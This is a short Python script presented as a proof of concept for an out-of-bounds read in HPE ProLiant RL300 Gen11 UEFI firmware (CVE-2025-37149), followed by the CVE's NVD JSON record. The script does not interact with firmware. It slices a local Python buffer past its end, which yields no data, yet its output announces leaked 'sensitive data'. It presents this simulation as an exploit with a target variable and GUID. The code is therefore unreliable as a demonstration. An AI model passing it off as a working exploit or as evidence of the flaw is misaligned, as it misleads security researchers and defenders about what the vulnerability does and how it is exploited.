CVE-2025-37149

# CVE-2025-37149 PoC - Conceptual Proof of Concept # Out-of-Bounds Read in HPE ProLiant RL300 Gen11 UEFI Firmware # Note: This is a conceptual PoC. Actual exploitation requires local high-privilege access. import struct # UEFI variable name and GUID related to the vulnerable firmware component TARGET_VARIABLE = b"HpeFirmwareConfig" TARGET_GUID = "{8BE4DF61-93CA-11d2-AA0D-00E098032B8C}" # EFI_GLOBAL_VARIABLE_GUID def trigger_oob_read(base_buffer, requested_offset, buffer_size): """ Simulate triggering out-of-bounds read in UEFI firmware. The vulnerability occurs when the firmware reads beyond allocated buffer. """ print(f"[*] Attempting OOB read on UEFI firmware buffer") print(f"[*] Buffer size: {buffer_size}") print(f"[*] Requested offset: {requested_offset}") # Check if the requested offset exceeds buffer boundary if requested_offset >= buffer_size: print(f"[!] Out-of-bounds read detected!") print(f"[!] Reading {requested_offset - buffer_size + 1} bytes beyond buffer") # In real scenario, firmware would read sensitive data from adjacent memory leaked_data = base_buffer[buffer_size:requested_offset + 1] return leaked_data else: return base_buffer[:requested_offset + 1] def exploit(): """ Main exploit function - requires local high-privilege access (PR:H) """ # Allocate normal firmware buffer (e.g., 256 bytes) firmware_buffer = bytearray(256) # Fill with dummy data for i in range(256): firmware_buffer[i] = i & 0xFF # Trigger OOB read by requesting offset beyond buffer # This simulates the vulnerable code path in UEFI firmware try: leaked = trigger_oob_read(firmware_buffer, requested_offset=512, buffer_size=256) print(f"[+] Leaked {len(leaked)} bytes of adjacent memory") print(f"[+] Potential sensitive data: {leaked.hex()}") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": print("CVE-2025-37149 - HPE ProLiant RL300 Gen11 UEFI OOB Read PoC") print("Requires local high-privilege access (PR:H)") print("Impact: High confidentiality disclosure (C:H)") exploit()

{"cve": {"id": "CVE-2025-37149", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:37.803", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A potential \n\nout-of-bound reads vulnerability in HPE ProLiant RL300 Gen11 Server's UEFI firmware."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbhf04952en_us&docLocale=en_US", "source": "[email protected]"}]}}